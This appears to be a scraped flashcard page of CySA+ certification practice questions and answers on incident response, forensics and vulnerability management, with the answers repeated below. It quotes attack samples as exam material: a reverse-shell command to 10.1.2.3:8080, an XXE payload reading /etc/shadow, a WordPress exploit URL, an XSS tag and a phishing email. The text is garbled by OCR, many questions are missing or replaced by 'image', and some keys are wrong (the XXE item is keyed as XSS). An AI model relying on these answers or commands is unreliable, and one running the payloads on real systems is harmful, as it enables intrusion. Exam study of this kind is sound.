cysa+2

100問 • 2年前

問題一覧

QUESTION 100 An organization has the following policy statements: - All emails entering or leaving the organization will be subject to inspection for malware, policy violations, and unauthorized coolant. - All network activity will be logged and monitored. - Confidential data will be tagged and tracked - Confidential data must never be transmitted in an unencrypted form. - Confidential data must never be stored on an unencrypted mobile device. Which of the following is the organization enforcing?

Data management policy

QUESTION 101 A Chief Executive Officer (CEO) is concerned the company will be exposed lo data sovereignty issues as a result of some new privacy regulations to help mitigate this risk. The Chief Information Security Officer (CISO) wants to implement an appropriate technical control. Which of the following would meet the requirement?

Geographic access requirements

QUESTION 102 A security analyst needs to provide the development learn with secure connectivity from the corporate network to a three-tier cloud environment. The developers require access to servers in all three tiers in order to perform various configuration tasks. Which of the following technologies should the analyst implement to provide secure transport?

VPN

QUESTION 103 A security analyst found an old version of OpenSSH running on a DMZ server and determined the following piece of code could have led to a command execution through an integer overflow; nresp = packet_get_inf ): if (nresp > 0) ( response = xmalloc (nresp*sizeof (char*) ) : for (i = 0; i < nresp; i++) response [i] = packet_get_string (NULL) ; ) Which of the following controls must be in place to prevent this vulnerability?

Use built-in functions from libraries to check and handle long numbers properly.

QUESTION 104 A cyber-security analyst is implementing a new network configuration on an existing network access layer to prevent possible physical attacks. Which of the following BEST describes a solution that would apply and cause fewer issues during the deployment phase?

Implement port security with one MAC address per network port of the switch.

QUESTION 105 A security analyst at example.com receives SIEM alert for an IDS signature and reviews the associated packet capture and TCP stream: Packet capture: image*

Contact the application owner for connect.example.local for additional information.

QUESTION 106 A security analyst needs to provide a copy of a hard drive for forensic analysis. Which of the following would allow the analyst to perform the task?

dd if=ldev/sda of=/mnt/usb/evidence.bin bs=4096; sha512sum /mnt/usblevidence.bin hashlog-Imnt/usblevidence.bin.hashlog Imnt/usblevidence.bin.hash

QUESTION 107 While monitoring the information security notification mailbox, a security analyst notices several emails were reported as spam. Which of the following should the analyst do FIRST?

Review the message in a secure environment.

QUESTION 108 Company A is in the process of merging with Company B. As part of the merger, connectivity between the ERP systems must be established so pertinent financial information can be shared between the two entities. Which of the following will establish a more automated approach to secure data transfers between the two entities?

Set up a VPN between Company A and Company B, granting access only to the ERPS within the connection.

QUESTION 109 A company has alerted planning the implemented a vulnerability management procedure. However, to security maturity level is low, so there are some prerequisites to complete before risk calculation and prioritization. Which of the following should be completed FIRST?

A risk identification process

QUESTION 110 A security learn implemented a SCM as part for its security-monitoring program there is a requirement to integrate a number of sources Into the SIEM to provide better context relative to the events being processed. Which of the following BST describes the result the security learn hopes to accomplish by adding these sources?

Data enrichment

QUESTION 111 A security analyst is investigating an incident related to an alert from the threat detection platform on a host (10.0.1.25) in a staging environment that could be running a cryptomining tool because it is sending traffic to an IP address that is related to Bitcoin. The network rules for the instance are the following:

Remove rules 1, 2, and 5.

QUESTION 112 An analyst is reviewing the following output as part of an incident:

Information is leaking from the memory of host 10.20.30.40

QUESTION 113 The Chief Information Security Officer (CISO) of a large financial institution is seeking a solution that will block a predetermined set of data points from being transferred or downloaded by employees. The CISO also wants to track the data assets by name, type, content, or data profile. Which of the following BEST describes what the CIS wants to purchase?

DLP

QUESTION 114 The majority of a company's employees have stated they are unable to perform their job duties due to outdated workstations, so the company has decided to institute BYOD. Which of the following would a security analyst MOST likely recommend for securing the proposed solution?

802.1X to enforce company policy on BYOD user hardware

QUESTION 115 The help desk is having difficulty keeping up with all onboarding and offboarding requests. Managers often submit, requests for new users at the last minute. causing the help desk to scramble to create accounts across many different Interconnected systems. Which of the following solutions would work BEST to assist the help desk with the onboarding and offboarding process while protecting the company's assets?

SSO

QUESTION 116 A security analyst is concerned the number of security incidents being reported has suddenly gone down. Daily business interactions have not changed, and no additional security controls have been implemented. Which of the following should the analyst review FIRST?

The IDS rule set

QUESTION 117 A developer is working ona program to convert user-generated input in a web form before it is displayed by the browser. This technique is referred to as:

output encoding.

QUESTION 118 A vulnerability scanner has identified an out-of-support database software version running on a server. The software update will take six to nine months to complete. The management team has agreed to a one-year extended support contract with the software vendor. Which of the following BEST describes the risk treatment in this scenario?

The company is accepting the inherent risk of the vulnerability.

QUESTION 119 Which of the following is an advantage of SOAR over SIEM?

SOAR reduces the amount of human intervention required.

QUESTION 120 Which of the following factors would determine the regulations placed on data under data sovereignty laws?

The data laws of the country in which the company is located

QUESTION 121 An organization's internal department frequently uses a cloud provider to store large amounts of sensitive data. A threat actor has deployed a virtual machine to attack another virtual machine to gain access to the data. Through the use of the cloud host's hypervisor, the threat actor has escalated the access rights. Which of the following actions would be BEST to remediate the vulnerability the attacker has used to exploit the system?

Update lo the secure hypervisor version.

QUESTION 122 An online gaming company was impacted by a ransomware attack. An employee opened an attachment that was received via an SMS attack on a company-issue firewall. Which following actions would help during the forensic analysis of the mobile device? (Choose two.)

Documenting the respective chain of custody, Performing a memory dump of the mobile device for analysis

image

192.168.48.147

QUESTION 124 During the threat modeling process for a new application that a company is launching, a security analyst needs to define methods and items to take into consideration. Which of the following are part of a known threat modeling method?

Spoofing tampering, repudiation, information disclosure, denial of service elevation of privilege

QUESTION 125 A Chief Information Security Officer has asked for a list of hosts that have critical and high- seventy findings as referenced in the CVE database. Which of the following tools would produce the assessment output needed to satisfy this request?

Nessus

QUESTION 126 An organization wants to implement a privileged access management solution to better manage the use to emergency and privileged service accounts. Which of the following would BEST satisfy the organization's goal?

Policy-based access controls

QUESTION 127 A security analyst is deploying a new application in the environment. The application needs to be integrated with several existing applications that contain SP. Prior to the deployment, the analyst should conduct:

an application stress test.

QUESTION 128 A manufacturing company uses a third-party service provider for Tier 1 security support. One of the requirements is that the provider must only source talent from its own country due to geopolitical and national security interests. Which of the following can the manufacturing company implement to ensure the third-party service provider meets this requirement?

Implement a secure supply chain program with governance

QUESTION 129 Which of the following APT adversary archetypes represent non-nation-state threat actors? (Select TWO)

Spider, Jackal

QUESTION 130 A security analyst was transferred to an organization's threat-hunting team to track specific activity throughout the enterprise environment. The analyst must observe and assess the number to times this activity occurs and aggregate the results. Which of the following is the BEST threat-hunting method for the analyst to use?

Stack counting

QUESTION 131 A security officer needs to find the most cost-effective solution to the current data privacy and protection gap found in the last security assessment. Which of the following is the BEST recommendation?

Create a data minimization plan.

QUESTION 132 An analyst is responding to an incident within a cloud infrastructure. Based on the logs and traffic analysis, the analyst thinks a container has been compromised. Which of the following should the analyst do FIRST?

Isolate the container from production using a predefined policy template

QUESTION 133 A security analyst sees the following OWASP ZAP output from a scan that was performed against a modern version of Windows while testing for client-side vulnerabilities: Alert Detail Low (Medium) - Web Browser XSs Protection not enabled Description: Web browser XSs protection not enabled, or disabled by the configuration of the HTTP Response header URL: https://domain.com/sun/ray Which of the following is the MOST likely solution to the listed vulnerability?

Enable the browser's XSS filter.

QUESTION 134 During the security assessment of a new application, a tester attempts to log in to the application but receives the following message incorrect password for given username. Which of the following can the tester recommend to decrease the likelihood that a malicious attacker will receive helpful information?

Recognize that error messaging does not provide confirmation of the correct element of authentication

image

C.B.A.D

QUESTION 136 During a review of SIEM alerts, a security analyst discovers the SIEM is receiving many alerts per day from the file-integrity monitoring toot about files from a newly deployed application that should not change. Which of the following steps should the analyst complete FIRST to respond to the issue?

Check if temporary files are being monitored

QUESTION 137 Which of the following is a difference between SOAR and SCAP?

SOAR has a wider breadth of capability using orchestration and automation, while SCAP is more limited in scope

image

SQL injection

QUESTION 139 A security analyst is reviewing the output of tcpdump to analyze the type of activity on a packet capture: look at image*

A port scan

image

192.168.12.21 made a TCP connection to 209.132.177.50

QUESTION 141 An analyst is responding to an incident involving an attack on a company-owned mobile device that was being used by an employee to collect data from clients in the field. Malware was loaded on the device via the installation of a third-party software package. The analyst has baselined the device. Which of the following should the analyst do to BEST mitigate future attacks?

Implement MDM

QUESTION 142 Some hard disks need to be taken as evidence for further analysis during an incident response. Which of the following procedures must be completed FIRST for this type of evidence acquisition?

Build the chain-of-custody document, noting the media model, serial number, size, vendor, date, and time of acquisition.

QUESTION 143 Which of the following is the software development process by which function, usability, and scenarios are tested against a known set of base requirements?

User acceptance testing

An organization wants to ensure the privacy of the data that is on its systems. Full disk encryption and DLP are already in use. Which of the following is the BEST option?

Enforce geofencing to limit data accessibility

QUESTION 145 A company wants to configure the environment to allow passive network monitoring. To avoid disrupting the sensitive network, which of the following must be supported by the scanner's NIC to assist with the company's request?

Port mirroring

QUESTION 146 Due to a rise in cyber attackers seeking PHI, a healthcare company that collects highly sensitive data from millions of customers is deploying a solution that will ensure the customers' data is protected by the organization internally and externally. Which of the following countermeasures can BEST prevent the loss of customers' sensitive data?

Implement multifactor authentication

QUESTION 147 A company's security team recently discovered a number of workstations that are at the end of life. The workstation vendor informs the team that the product is no longer supported and patches are no longer available. The company is not prepared to cease its use of these workstations. Which of the following would be the BEST method to protect these workstations from threats?

Isolate the workstations and air gap them when it is feasible

QUESTION 148 During a review of recent network traffic, an analyst realizes the team has seen this same traffic multiple times in the past three weeks, and it resulted in confirmed malware activity. The analyst also notes there is no other alert in place for this traffic After resolving the security incident, which of the following would be the BEST action for the analyst to take to increase the chance of detecting this traffic in the future?

Communicate the security incident to the threat team for further review and analysis

QUESTION 149 A company uses an FTP server to support its critical business functions. The FTP server is configured as follows: - The FTP service is running with the data directory configured in /opt/ftp/data. -The FTP server hosts employees' home directories in /home. - Employees may store sensitive information in their home irectories. An loC revealed that an FTP directory traversal attack resulted in sensitive data loss. Which of the following should a server administrator implement to reduce the risk of current and future directory traversal attacks targeted at the FTP server?

Run the FTP server n a chroot environment

QUESTION 150 A company offers a hardware security appliance to customers that provides remote administration of a device on the customer's network. Customers are not authorized to alter the configuration. The company deployed a software process to manage unauthorized changes to the appliance log them, and forward them to a central repository for evaluation. Which of the following processes is the company using to ensure the appliance is not altered from its original configured state?

Change management

QUESTION 152 A company's legal and accounting teams have decided it would be more cost-effective to offload the risks of data storage toa third party. The IT management team has decided to implement a cloud model and has asked the security team for recommendations. Which of the following will allow all data to be kept on the third-party network?

CASB

QUESTION 151 A security analyst is investigating a reported phishing attempt that was received by many users throughout the company. The text of one of the emails is shown below: Return-Path: <security@offl ce365.com > Received: from [122.167.40.119] Message-ID: <FE3638ACA.2020509@offlce365.com> Date: 23 May 2020 11:40:36 -0400 From: security@offl ce365.com MIME-Version: 1.0 To: Paul Vieira <pvieira@company.com> Subject: Account Lockout Content-Type: HTML; Office 365 User, It looks like your account has been locked out. Please click this <a href-"http:/laccountfix-office356.com login. php">link</> and follow the prompts to restore access. Regards, Security Team Due to the size of the company and the high storage requirements, the company does not log DNS requests or perform packet captures of network traffic, but it does log network flow data. Which of the following commands will the analyst most likely execute NEXT?

nslookup accountfix-office365.com

QUESTION 153 While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?

Determine what attack the odd characters are indicative of.

QUESTION 154 A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?

Incident response plan

QUESTION 155 A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?

Block the IP range of the scans at the network firewal.

QUESTION 156 An analyst has received an IPS event notification from the SIEM stating an lP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet: /wp- json/trx addons/V2/get/sc layout?sc=wp insert user&role=administrator Which of the following controls would work best to mitigate the attack represented by this snippet?

Limit user creation to administrators only.

QUESTION 157 A penetration tester submited data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?

Performing input validation before allowing submission

QUESTION 158 A cybersecurity team lead is developing metrics to present in the weekly executive briefs.Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?

Mean time to contain

QUESTION 159 An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has: - created the initial evidence log. - disabled the wireless adapter on the device. - interviewed the employee, who was unable to identify the website that was accessed. - reviewed the web proxy traffic logs. Which of the following should the analyst do to remediate the infected device?

Update the system firmware and reimage the hardware.

QUESTION 160 A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?

High GPU utilization

QUESTION 161 A company's security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?

Legal department

QUESTION 162 Given the following CVSS string: CVSS: 3.0/AV:N/AC: L/ PR: N/UI :N/S:U/C: H/I :H/A:H Which of the following attributes correctly describes this vulnerability?

The vulnerability is network based.

image*

QUESTION 165 A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on the device is not modified?

Generate a hash value and make a backup image.

image*

brady

QUESTION 166 Which of the following best describes the goal of a tabletop exercise?

To test possible incident scenarios and how to react properly

QUESTION 167 A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?

The digital certificate on the web server was self-signed.

QUESTION 168 A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:

Log entry 4

QUESTION 169 A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?

Determine the asset value of each system.

image

A new program has been set to execute on system start.

QUESTION 171 Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

SLA

QUESTION 172 A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?

Beaconing

QUESTION 173 An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Choose two).

Deploy EDR on the web server and the database server to reduce the adversary's capabilities., Use microsegmentation to restrict connectivity to/from the web and database servers.

image*

Execute commands through an unsecured service account.

QUESTION 175 A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application: getConnection (database01, "alpha" , "AxTv.127GdCx94 GTd"); Which of the following is the most likely vulnerability in this system?

. Hard-coded credential

QUESTION 176 A technician is analyzing output from a popular network mapping tool for a PCl audit: look at image*

The host is allowing insecure cipher suites.

QUESTION 177 A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?

SOAR

QUESTION 178 An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?

Make a forensic image of the device and create a SHA-1 hash.

QUESTION 179 An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?

Nation-state

QUESTION 180 A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?

Registry

QUESTION 181 While reviewing web server logs, a security analyst found the following line: < IMG SRC='vbscript :msgbox ("test") > Which of the following malicious activities was attempted?

Cross-site scripting

QUESTION 182 A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https:lloffice365password.acme.co. The site's standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?

A social engineering attack is underway.

QUESTION 183 A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?

Registry key values

QUESTION 184 A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?

letc/shadow

QUESTION 185 A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?

Passive scanning

QUESTION 186 A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?

Decomission the proxy

QUESTION 187 An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?

Time synchronization

QUESTION 188 An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?

SOAR

QUESTION 189 An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst's concern?

Any discovered vulnerabilities will not be remediated.

QUESTION 190 Which of the following describes the best reason for conducting a root cause analysis?

The root cause analysis identifies the contributing items that facilitated the event.

QUESTION 191 Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?

Automation

QUESTION 192 A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device's operating system. Which of the following best meets this requirement?

EDR

QUESTION 193 A security analyst identified the following suspicious entry on the host-based IDS logs: bash -i >& /dev/tcp /10.1.2.3/8080 0>&1 Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

#/bin/bash netstat -antp |grep 8080 >dev/null && echo "Malicious activity" || echo "OK"

QUESTION 194 A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?

Implement segmentation with ACLS.

QUESTION 195 A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure ?

Replace the current MD5 with SHA-256.

QUESTION 196 A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?

Check configurations to determine whether USB ports are enabled on company assets.

QUESTION 197 A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?

TCPDump

QUESTION 198 A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:  <!DOCTYPE replace (<!ENTITY ent SYSTEM "File:/IIl letc/shadow">1> <userInfo> <firstName>John</firstName> <lastName> $entry;</lastName> </userInfo> Which of the following vulnerability types is the security analyst validating?

XSS

100

QUESTION 199 Which of the following is the most important factor to ensure accurate incident response reporting?

A wel-defined timeline of the events

security+1

security+1

security+2

security+2

security+6

security+6

security+7

security+7

security+8

security+8

security+9

security+9

security+10

security+10

security+11

security+11

security+12

security+12

cysa+1

cysa+1

cysa+3

cysa+3

A+1

A+1

問題一覧

Data management policy

Geographic access requirements

VPN

Use built-in functions from libraries to check and handle long numbers properly.

Implement port security with one MAC address per network port of the switch.

QUESTION 105 A security analyst at example.com receives SIEM alert for an IDS signature and reviews the associated packet capture and TCP stream: Packet capture: image*

Contact the application owner for connect.example.local for additional information.

QUESTION 106 A security analyst needs to provide a copy of a hard drive for forensic analysis. Which of the following would allow the analyst to perform the task?

dd if=ldev/sda of=/mnt/usb/evidence.bin bs=4096; sha512sum /mnt/usblevidence.bin hashlog-Imnt/usblevidence.bin.hashlog Imnt/usblevidence.bin.hash

QUESTION 107 While monitoring the information security notification mailbox, a security analyst notices several emails were reported as spam. Which of the following should the analyst do FIRST?

Review the message in a secure environment.

Set up a VPN between Company A and Company B, granting access only to the ERPS within the connection.

A risk identification process

Data enrichment

Remove rules 1, 2, and 5.

QUESTION 112 An analyst is reviewing the following output as part of an incident:

Information is leaking from the memory of host 10.20.30.40

DLP

802.1X to enforce company policy on BYOD user hardware

SSO

The IDS rule set

QUESTION 117 A developer is working ona program to convert user-generated input in a web form before it is displayed by the browser. This technique is referred to as:

output encoding.

The company is accepting the inherent risk of the vulnerability.

QUESTION 119 Which of the following is an advantage of SOAR over SIEM?

SOAR reduces the amount of human intervention required.

QUESTION 120 Which of the following factors would determine the regulations placed on data under data sovereignty laws?

The data laws of the country in which the company is located

Update lo the secure hypervisor version.

Documenting the respective chain of custody, Performing a memory dump of the mobile device for analysis

image

192.168.48.147

Spoofing tampering, repudiation, information disclosure, denial of service elevation of privilege

Nessus

Policy-based access controls

an application stress test.

Implement a secure supply chain program with governance

QUESTION 129 Which of the following APT adversary archetypes represent non-nation-state threat actors? (Select TWO)

Spider, Jackal

Stack counting

Create a data minimization plan.

Isolate the container from production using a predefined policy template

Enable the browser's XSS filter.

Recognize that error messaging does not provide confirmation of the correct element of authentication

image

C.B.A.D

Check if temporary files are being monitored

QUESTION 137 Which of the following is a difference between SOAR and SCAP?

SOAR has a wider breadth of capability using orchestration and automation, while SCAP is more limited in scope

image

SQL injection

QUESTION 139 A security analyst is reviewing the output of tcpdump to analyze the type of activity on a packet capture: look at image*

A port scan

image

192.168.12.21 made a TCP connection to 209.132.177.50

Implement MDM

Build the chain-of-custody document, noting the media model, serial number, size, vendor, date, and time of acquisition.

QUESTION 143 Which of the following is the software development process by which function, usability, and scenarios are tested against a known set of base requirements?

User acceptance testing

An organization wants to ensure the privacy of the data that is on its systems. Full disk encryption and DLP are already in use. Which of the following is the BEST option?

Enforce geofencing to limit data accessibility

Port mirroring

Implement multifactor authentication

Isolate the workstations and air gap them when it is feasible

Communicate the security incident to the threat team for further review and analysis

Run the FTP server n a chroot environment

Change management

CASB

nslookup accountfix-office365.com

Determine what attack the odd characters are indicative of.

Incident response plan

Block the IP range of the scans at the network firewal.

Limit user creation to administrators only.

Performing input validation before allowing submission

Mean time to contain

Update the system firmware and reimage the hardware.

High GPU utilization

Legal department

QUESTION 162 Given the following CVSS string: CVSS: 3.0/AV:N/AC: L/ PR: N/UI :N/S:U/C: H/I :H/A:H Which of the following attributes correctly describes this vulnerability?

The vulnerability is network based.

image*

Generate a hash value and make a backup image.

image*

brady

QUESTION 166 Which of the following best describes the goal of a tabletop exercise?

To test possible incident scenarios and how to react properly

The digital certificate on the web server was self-signed.

QUESTION 168 A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:

Log entry 4

Determine the asset value of each system.

image

A new program has been set to execute on system start.

QUESTION 171 Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

SLA

Beaconing

Deploy EDR on the web server and the database server to reduce the adversary's capabilities., Use microsegmentation to restrict connectivity to/from the web and database servers.

image*

Execute commands through an unsecured service account.

. Hard-coded credential

QUESTION 176 A technician is analyzing output from a popular network mapping tool for a PCl audit: look at image*

The host is allowing insecure cipher suites.

SOAR

Make a forensic image of the device and create a SHA-1 hash.

Nation-state

Registry

QUESTION 181 While reviewing web server logs, a security analyst found the following line: < IMG SRC='vbscript :msgbox ("test") > Which of the following malicious activities was attempted?

Cross-site scripting

A social engineering attack is underway.

Registry key values

letc/shadow

Passive scanning

Decomission the proxy

QUESTION 187 An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?

Time synchronization

SOAR

Any discovered vulnerabilities will not be remediated.

QUESTION 190 Which of the following describes the best reason for conducting a root cause analysis?

The root cause analysis identifies the contributing items that facilitated the event.

QUESTION 191 Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?

Automation

EDR

#/bin/bash netstat -antp |grep 8080 >dev/null && echo "Malicious activity" || echo "OK"

Implement segmentation with ACLS.

Replace the current MD5 with SHA-256.

Check configurations to determine whether USB ports are enabled on company assets.

TCPDump

XSS

100

QUESTION 199 Which of the following is the most important factor to ensure accurate incident response reporting?

A wel-defined timeline of the events